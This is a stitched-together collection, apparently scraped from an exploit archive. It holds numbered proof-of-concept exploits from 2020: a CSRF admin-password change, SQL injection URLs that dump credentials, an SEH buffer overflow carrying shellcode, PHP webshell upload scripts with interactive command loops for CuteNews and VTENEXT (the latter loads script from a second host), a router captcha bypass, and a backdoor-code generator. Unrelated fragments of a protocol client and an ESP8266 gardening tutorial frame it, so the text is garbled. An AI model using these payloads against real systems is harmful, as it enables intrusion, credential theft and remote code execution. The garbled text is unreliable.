                 for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'):
                     msg = msg.split('\t')
                     if '.' not in msg[0]:
                         msg = [self.ip] + msg
                     msgs.append(msg)
                 return msgs, None
             else:
                 raise Exception('invalid packet magic: ' + hdr[:4].hex())

         def recv_msg(self):
             if len(self.msg_queue):
                 ret = self.msg_queue[0]
                 self.msg_queue = self.msg_queue[1:]
                 return ret

             msgs, _ = self.recv()
             if len(msgs) > 1:
                 self.msg_queue.extend(msgs[1:])
             return msgs[0]

         def send_msg(self, msg):
             self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode())

         def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'):
             self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1'])
             resp = self.recv_msg()
             if resp[4:6] != ['LOGONFAILED', '3']:
                 print(resp)
                 raise Exception('unrecognized login response')
             crypt_key = base64.b64decode(resp[8])
             return crypt_key

         def login_with_key(self, uname, pw, crypt_key):
             self.reconnect()
             hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest())
             hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest())
             self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1'])
             resp = self.recv_msg()
             if resp[4] == 'LOGONFAILED':
                 return False
             self.msg_queue = [resp] + self.msg_queue
             return True

         def login(self, uname, pw):
             crypt_key = self.get_crypt_key(1, uname, pw)
             if not self.login_with_key(uname, pw, crypt_key):
                 return False
             return crypt_key

     ###
     ### lib/crypt.py
     ###

     pat = b'abcdefghijklmnopqrstuvwxyz0123456789'

     def td_asctonum(code):
         if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
             code += 0x20
         if code not in pat:
             return None
         return pat.index(code)

     def td_numtoasc(code):
         if code < 36:
             return pat[code]
         return None

     gword = [
         b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC',
         b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta',
         b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC',
         b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH',
         b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt',
         b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ',
         b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX',
         b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1',
         b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ',
         b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5',
         b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG',
         b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI',
         b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB',
         b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb',
         b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs',
         b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh',
         b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX',
         b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW',
         b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq',
         b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU',
         b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe',
         b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG',
         b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1',
         b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm',
         b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c',
         b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5',
         b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK',
         b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s',
         b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR',
         b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb',
         b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS',
         b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54',
         b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ',
         b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx',
         b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ',
         b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg'
     ]

     def td_decrypt(data, key):
         kdx = 0
         ret = []
         for idx, code in enumerate(data):
             while True:
                 if kdx >= len(key):
                     kdx = 0
                 kcode = key[kdx]
                 knum = td_asctonum(kcode)
                 if knum is None:
                     kdx += 1
                     continue
                 break

             if code not in gword[knum]:
                 return None
             cpos = gword[knum].index(code)
             ret.append(td_numtoasc(cpos))
             kdx += 1

         return bytes(ret)

     if __name__ == '__main__':
         main()
  8. # Exploit Title: Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)
     # Google Dork: inurl:scopia+index.jsp
     # Date: 2020-09-09
     # Exploit Author: v1n1v131r4
     # Vendor Homepage: https://avaya.com
     # Software Link: https://support.avaya.com/downloads/download-details.action?contentId=C201772012204170_4&productId=P1605
     # Version: 8.3.915.4
     # Tested on: Windows 10 Pro
     # CVE : N/A
     # PoC: https://github.com/V1n1v131r4/Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4

     # CSRF to change admin password
     # The admin password will be changed to "attacker"

     <!DOCTYPE html>
     <html>
     <body>
       <form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
         <input type="text" name="JSESSIONID" value="">
         <input type="text" name="newadminusername" value="">
         <input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
         <input type="text" name="newenablext1000meetingpin" value="false">
         <input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
         <input type="text" name="checkstatus" value="true">
         <input type="submit" value="Send">
       </form>
     </body>
     </html>
9. # Exploit Title: Tailor Management System - 'id' SQL Injection
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali linux
# CVE: N/A

http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- -

http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- -

http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -
10. # Exploit Title: Audio Playback Recorder 3.2.2 - Local Buffer Overflow (SEH)
# Date: 2020-09-08
# Author: Felipe Winsnes
# Software Link: https://archive.org/download/tucows_288670_Audio_Playback_Recorder/AudioRec.exe
# Version: 3.2.2
# Tested on: Windows 7 (x86)
# Blog: https://whitecr0wz.github.io/
# Proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings11/11-proof.gif

# Proof of Concept:

# 1.- Run the python script, it will create the file "poc.txt" & "buf.txt".
# 2.- Copy the content of the new file "buf.txt" to clipboard.
# 3.- Open the application.
# 4.- Click on the bottom-right blue button to eject.
# 5.- Delete everything on the parameter and paste the clipboard (buf.txt).
# 6.- Click eject once again to close it.
# 7.- Copy poc.txt to the clipboard.
# 8.- Click on "Register".
# 9.- Paste clipboard (poc.txt) on the parameter "Name".
# 10.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 447 bytes
buf = b"w00tw00t"
buf += b"\x89\xe2\xda\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
buf += b"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b\x58\x6d\x52"
buf += b"\x63\x30\x47\x70\x63\x30\x61\x70\x6b\x39\x4a\x45\x65"
buf += b"\x61\x4f\x30\x33\x54\x6e\x6b\x30\x50\x66\x50\x6c\x4b"
buf += b"\x62\x72\x54\x4c\x4c\x4b\x33\x62\x32\x34\x4c\x4b\x42"
buf += b"\x52\x64\x68\x64\x4f\x4d\x67\x42\x6a\x37\x56\x36\x51"
buf += b"\x39\x6f\x4e\x4c\x67\x4c\x50\x61\x31\x6c\x45\x52\x36"
buf += b"\x4c\x45\x70\x7a\x61\x78\x4f\x46\x6d\x37\x71\x4a\x67"
buf += b"\x79\x72\x78\x72\x36\x32\x43\x67\x6e\x6b\x56\x32\x34"
buf += b"\x50\x6e\x6b\x51\x5a\x77\x4c\x6e\x6b\x52\x6c\x74\x51"
buf += b"\x34\x38\x49\x73\x53\x78\x67\x71\x48\x51\x30\x51\x6e"
buf += b"\x6b\x62\x79\x37\x50\x56\x61\x6a\x73\x6c\x4b\x63\x79"
buf += b"\x45\x48\x79\x73\x47\x4a\x42\x69\x6c\x4b\x44\x74\x6c"
buf += b"\x4b\x56\x61\x68\x56\x76\x51\x59\x6f\x4c\x6c\x79\x51"
buf += b"\x58\x4f\x54\x4d\x77\x71\x39\x57\x76\x58\x4b\x50\x53"
buf += b"\x45\x38\x76\x47\x73\x71\x6d\x5a\x58\x37\x4b\x31\x6d"
buf += b"\x46\x44\x71\x65\x4a\x44\x33\x68\x4e\x6b\x36\x38\x57"
buf += b"\x54\x36\x61\x6a\x73\x43\x56\x6c\x4b\x54\x4c\x50\x4b"
buf += b"\x6c\x4b\x36\x38\x57\x6c\x75\x51\x6b\x63\x4c\x4b\x45"
buf += b"\x54\x4c\x4b\x65\x51\x6a\x70\x6f\x79\x73\x74\x57\x54"
buf += b"\x76\x44\x33\x6b\x63\x6b\x43\x51\x72\x79\x72\x7a\x63"
buf += b"\x61\x6b\x4f\x49\x70\x61\x4f\x63\x6f\x61\x4a\x4c\x4b"
buf += b"\x62\x32\x4a\x4b\x4e\x6d\x73\x6d\x61\x7a\x57\x71\x6c"
buf += b"\x4d\x4f\x75\x4c\x72\x47\x70\x65\x50\x35\x50\x56\x30"
buf += b"\x63\x58\x50\x31\x6e\x6b\x32\x4f\x4c\x47\x49\x6f\x79"
buf += b"\x45\x6d\x6b\x6d\x30\x47\x6d\x76\x4a\x65\x5a\x33\x58"
buf += b"\x49\x36\x7a\x35\x6d\x6d\x4d\x4d\x49\x6f\x4e\x35\x37"
buf += b"\x4c\x37\x76\x51\x6c\x35\x5a\x6f\x70\x6b\x4b\x4b\x50"
buf += b"\x63\x45\x54\x45\x6f\x4b\x53\x77\x54\x53\x71\x62\x70"
buf += b"\x6f\x50\x6a\x35\x50\x46\x33\x79\x6f\x68\x55\x31\x73"
buf += b"\x53\x51\x70\x6c\x43\x53\x56\x4e\x62\x45\x73\x48\x71"
buf += b"\x75\x67\x70\x41\x41"

egg = ""
egg += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egg += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10023B71)

buffer = "A" * 456 + nseh + seh + "A" * 5 + egg + "\xff" * 200

f = open ("poc.txt", "w")
f.write(buffer)
f.close()

f = open ("buf.txt", "w")
f.write(buf)
f.close()
11. # Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447

#! /bin/env python3

import requests
from base64 import b64decode
import io
import re
import string
import random
import sys

banner = """
  _____     __       _  __                ___  ___  ___
 / ___/_ __/ /____  / |/ /__ _    _____  |_  |<  / |_  |
/ /__/ // / __/ -_)/    / -_) |/|/ (_-<  / __/ / / / __/
\___/\_,_/\__/\__//_/|_/\__/|__,__/___/ /____(_)_(_)____/
   ___  _________
  / _ \/ ___/ __/
 / , _/ /__/ _/
/_/|_|\___/___/
"""
print (banner)
print ("[->] Usage python3 expoit.py")
print ()
sess = requests.session()
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")

def extract_credentials():
    global sess, ip
    url = f"{ip}/CuteNews/cdata/users/lines"
    encoded_creds = sess.get(url).text
    buff = io.StringIO(encoded_creds)
    chash = buff.readlines()
    if "Not Found" in encoded_creds:
        print ("[-] No hashes were found skipping!!!")
        return
    else:
        for line in chash:
            if "<?php die('Direct call - access denied'); ?>" not in line:
                credentials = b64decode(line)
                try:
                    sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
                    print (sha_hash)
                except:
                    pass

def register():
    global sess, ip
    userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
    postdata = {
        "action" : "register",
        "regusername" : userpass,
        "regnickname" : userpass,
        "regpassword" : userpass,
        "confirm" : userpass,
        "regemail" : f"{userpass}@hack.me"
    }
    register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)
    if 302 == register.status_code:
        print (f"[+] Registration successful with username: {userpass} and password: {userpass}")
    else:
        sys.exit()

def send_payload(payload):
    global ip
    token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
    signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
    signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
    logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
    print (f"signature_key: {signature_key}")
    print (f"signature_dsi: {signature_dsi}")
    print (f"logged in user: {logged_user}")
    files = {
        "mod" : (None, "main"),
        "opt" : (None, "personal"),
        "__signature_key" : (None, f"{signature_key}"),
        "__signature_dsi" : (None, f"{signature_dsi}"),
        "editpassword" : (None, ""),
        "confirmpassword" : (None, ""),
        "editnickname" : (None, logged_user),
        "avatar_file" : (f"{logged_user}.php", payload),
        "more[site]" : (None, ""),
        "more[about]" : (None, "")
    }
    payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text
    print("============================\nDropping to a SHELL\n============================")
    while True:
        print ()
        command = input("command > ")
        postdata = {"cmd" : command}
        output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
        if 404 == output.status_code:
            print ("sorry i can't find your webshell try running the exploit again")
            sys.exit()
        else:
            output = re.sub("GIF8;", "", output.text)
            print (output.strip())

if __name__ == "__main__":
    print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
    extract_credentials()
    print ("================================================================")
    print()
    print ("=============================\nRegistering a users\n=============================")
    register()
    print()
    print("=======================================================\nSending Payload\n=======================================================")
    send_payload(payload)
    print ()
12. # Exploit Title: ZTE Router F602W - Captcha Bypass
# Exploit Author: Hritik Vijay (@MrHritik)
# Vendor Homepage: https://zte.com.cn
# Reported: 2019-06-14
# Version: F6x2W V6.0.10P2T2
# Version: F6x2W V6.0.10P2T5
# Tested on: F602W
# CVE: CVE-2020-6862

Background
-----------
Captcha is used to make sure the form is being filled by a real person rather than an automated script. This is a very popular safety measure and bypassing it could lead to potential compromise.

Introduction
------------
While logging in to the affected device you are presented with a username, password and captcha field. Submitting the form results in an HTTP request being sent out to /checkValidateCode.gch to validate the captcha; if valid, it goes on to really submit the login request. This can be easily bypassed as this is a client side verification. One can always ignore the response and proceed to forcefully submit the form via Javascript (via calling the subpageSubmit() method).

A typical login request looks like this:

POST / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Connection: close
Cookie: _TESTCOOKIESUPPORT=1
Upgrade-Insecure-Requests: 1

frashnum=&action=login&Frm_Logintoken=2&Username=admin&Password=admin&Validatecode=literally_anything

Though, firing the same request twice fails with a text on the top saying "Error". This pretty much defeats our purpose. It turns out that on every login attempt, the parameter Frm_Logintoken gets incremented by one and is required to match the server side value. This can pretty easily be achieved by some pattern matching, thus allowing any script to bypass the captcha and log in.

Threat
-------
A captcha bypass can really help in bruteforcing the credentials but luckily the router limits the login trials to 3 attempts. In the real world though, things are a bit different. The affected ZTE router comes with a default password. Given that the devices on a same ISP network can access each other, it would be a matter of time before someone writes a script to log in to every router in the network and take control of it.

PoC
-------
#!/bin/bash
SERVER=192.168.1.1
USER="admin"
PASS="admin"

getToken(){
    curl -s --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER | grep 'Frm_Logintoken")' | cut -d\" -f4
}

Frm_Logintoken=`getToken`
s=$(curl -sv --data "frashnum=&action=login&Frm_Logintoken=$Frm_Logintoken&Username=$USER&Password=$PASS" --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER -w "%{http_code}" -o /dev/null 2> /tmp/zte_cookie)

if [[ $s -eq 302 ]]; then
    echo "Logged in"
    echo "Open http://$SERVER/start.ghtml"
    echo `grep -o Set-Cookie.* /tmp/zte_cookie`
else
    echo "Failed"
fi
13. #!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.

from os import system

this_pattern = "BEEF"*21125 # needs to be filled to len ~84500

# TTF file header (probably has some junk data in it) taken from MesloLGS NF Regular.ttf
ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54"
"\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45"
"\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f"
"\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55"
"\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f"
"\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45"
"\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61"
"\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74"
"\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67"
"\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73"
"\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79"
"\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61"
"\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65"
"\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74"
"\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63"
"\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78"
"\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d"
"\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73"
"\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65"
"\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00"
"\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08"
"\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14"
"\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a")

print('[+] Generating crash.ttf with DEADDEAD')

with open("./crash.ttf", 'w') as f:
    f.write(ttf_header)
    f.write(this_pattern)
    f.close()

print('[+] Done')
print('[+] Triggering out-of-bounds write in gnome-font-viewer')
system("/usr/bin/gnome-font-viewer ./crash.ttf")
14. #!/usr/bin/python3
# Exploit Title: VTENEXT 19 CE - Remote Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE : N/A

# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure

# This script should be easy enough to follow.
# We string together the three vulnerabilities to get RCE.
# XSS - The "From" field of the VTENEXT Messages module is vulnerable.
# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default .
# CSRF - No CSRF protections in place.

# exploit.js needs to be hosted somewhere, IP's need to be replaced
# check_csrf() should be changed based on your setup
# run_shell() is a "nice to have"

# content of exploit.js
"""
function insertImage() {
    var xhr = new XMLHttpRequest();
    xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);
    xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');
    xhr.setRequestHeader('Content-Length', '248');
    xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');
    xhr.withCredentials = true;
    var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}
insertImage();
"""

import smtplib
import datetime
import requests
import os
import time

base_url = "http://192.168.226.168/vtenext19ce/"

print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")

def build_url():
    d = datetime.datetime.today()
    year = str(d.year)
    month = str(d.strftime("%B"))
    week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])
    tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"
    return(tmp)

def build_mail():
    _from = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""
    _to = "admin@example.com"
    _subject = "Important!"
    _body = "While you're reading this, a file is being uploaded to this server."
    msg = "From: " + _from + "\n"
    msg += "To: " + _to + "\n"
    msg += "Subject: " + _subject + "\n\n"
    msg += _body
    return msg

def send_mail():
    msg = build_mail()
    smtp_server = '192.168.226.167'
    smtp_port = 25
    sender = 'user1@lab.local'
    receiver = 'admin@lab.local'
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.sendmail(sender, receiver, msg)

def check_csrf():
    while True:
        is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()
        if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
            print("[>] CSRF triggered")
            break
        else:
            time.sleep(0.5)
            continue

def find_shell():
    print("[>] Locating shell")
    time.sleep(1)
    tmp1 = build_url()
    for i in range(1, 9999):
        url = tmp1 + str(i) + "_shell.pht"
        r = requests.get(url)
        if r.status_code == 200:
            print("[>] Found the shell")
            print("[-] Location: " + url)
            return url
        else:
            continue

def run_shell(x):
    print("\n")
    while True:
        cmd = input("shell> ")
        if cmd == "exit":
            break
        else:
            url = x + "?x=" + cmd
            r = requests.get(url)
            print(r.text)

print("[>] Sending email")
send_mail()
print("[-] Waiting for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)
print("[!] Done!")
15. # Exploit Title: ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path
# Discovery by: Burhanettin Özgenç
# Discovery Date: 2020-09-15
# Vendor Homepage: https://www.forensit.com/downloads.html
# Tested Version: 2.2.0.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForensiTAppxService" | findstr /i /v """

ForensiT AppX Management Service   ForensiTAppxService   C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe   Auto

# Service info:

C:\>sc qc ForensiTAppxService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ForensiTAppxService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ForensiT AppX Management Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or other security applications where it could potentially be executed
# during application startup or reboot. If successful, the local user's code would execute with
# the elevated privileges of the application.
16. # Exploit Title: Mida eFramework 2.9.0 - Back Door Access
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.9.0
# CVE : CVE-2020-15921

#! /usr/bin/python3
# -*- coding: utf-8 -*-

from datetime import date

def print_disclaimer():
    print("""
---------------------
Disclaimer:
1) For testing purpose only.
2) Do not attack production environments.
3) Intended for educational purposes only and cannot be used for law violation or personal gain.
4) The author is not responsible for any possible harm caused by this material.
---------------------""")

def print_info():
    print("""
[*] Mida Solutions eFramework PDC Administrative Back-Door access (CVE-2020-15921)
[*] Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] This script can be used to retrieve the code which gives you the possibility to change the password.
[*] How it works:
    1) run the script
    2) copy the output to the URL you want to access (i.e. http://192.168.1.60:8090/PDC/extreq.php?code=THE-CODE)
    3) change the password
    4) access as admin with the password
""")

def main():
    print_info()
    print_disclaimer()

    abc = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
           'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']

    baseString = 'midasoluti' # default value from source code

    today = date.today()
    dateString = "{}0{:02d}0{}".format(today.day, today.month, today.year)

    retString = ""
    for i in range(0,len(baseString)):
        n = int(abc.index(baseString[i]))
        m = int(dateString[i])
        s = n+m
        if (s >= len(abc)):
            s = m
        retString += abc[s]

    print("[+] Generated code: {}".format(retString))
    print("[?] Example URL: http://target:8090/PDC/extreq.php?code={0} ".format(retString))
    print("[?] Example URL: https://target/PDC/extreq.php?code={0} ".format(retString))

if __name__ == '__main__':
    main()
17. # Exploit Title: Seat Reservation System 1.0 - 'id' SQL Injection
# Date: 2020-09-20
# Exploit Author: Augkim
# Vendor Homepage: https://www.sourcecodester.com/php/14452/seat-reservation-system-movie-theater-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
# Tested on: Apache2

POST /URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8-- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sere/
Connection: close
Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: foo.example.org

PoC:
/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--
18. To enrich life in elderly care, this article introduces how to use an ESP8266 to build an intelligent flower cultivation system.

Implementation of functions

Check the current temperature, humidity and soil humidity through the mobile phone. When the soil humidity is less than 50%, automatically start the relay and water with a water pump. Disconnect the relay if the humidity exceeds 50%.

Required Equipment

esp8266
relay
DHT11
soil moisture sensor

Line connection

Equipment     VCC (+)   GND (-)   Signal Line
Relay         3V        GND       D4
DHT11         3V        GND       D2
Soil Sensor   3V        GND       D0

Code

#define BLINKER_WIFI
#define BLINKER_MIOT_SENSOR   // Enable the Xiao AI (Xiaomi voice assistant) sensor integration
#define soilPin A0            // Soil sensor pin DO
#define CS 2                  // Define the relay pin as D4

#include <Blinker.h>
#include <DHT.h>              // DHT11 sensor header file

